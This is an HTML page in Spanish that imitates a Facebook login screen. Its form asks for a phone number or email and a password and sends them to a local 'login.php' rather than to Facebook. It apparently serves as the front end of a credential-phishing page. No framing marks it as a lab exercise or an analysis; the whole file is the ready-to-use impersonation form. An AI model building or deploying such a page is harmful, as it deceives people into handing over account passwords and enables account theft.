<!DOCTYPE html>
<html>
<head>
    <title>Iniciar sesión en Facebook</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #a5e8f5;
        }
        .container {
            max-width: 400px;
            margin: 0 auto;
            padding: 20px;
            background-color: #f0ebeb;
            border-radius: 5px;
            margin-top: 100px;
        }
        .form-control {
            width: 100%;
            padding: 10px;
            margin-bottom: 10px;
            border: 1px solid #ccc;
            border-radius: 3px;
        }
        .btn {
            width: 100%;
            padding: 10px;
            background-color: #177eec;
            color: white;
            border: none;
            border-radius: 3px;
        }
        .btn:hover {
            background-color: #438aae;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Iniciar sesion en Facebook</h1>
        <form action="login.php" method="post">
            <h3>Direccion de correo electronico o numero de telefono</h3>
            <input type="text" name="numero_celular" class="form-control" placeholder="Numero de celular" required>
            <h3>Contraseña</h3>
            <input type="password" name="contrasena" class="form-control" placeholder="Contraseña" required>
            <input type="submit" value="Iniciar sesion" class="btn">
        </form>
    </div>
</body>
</html>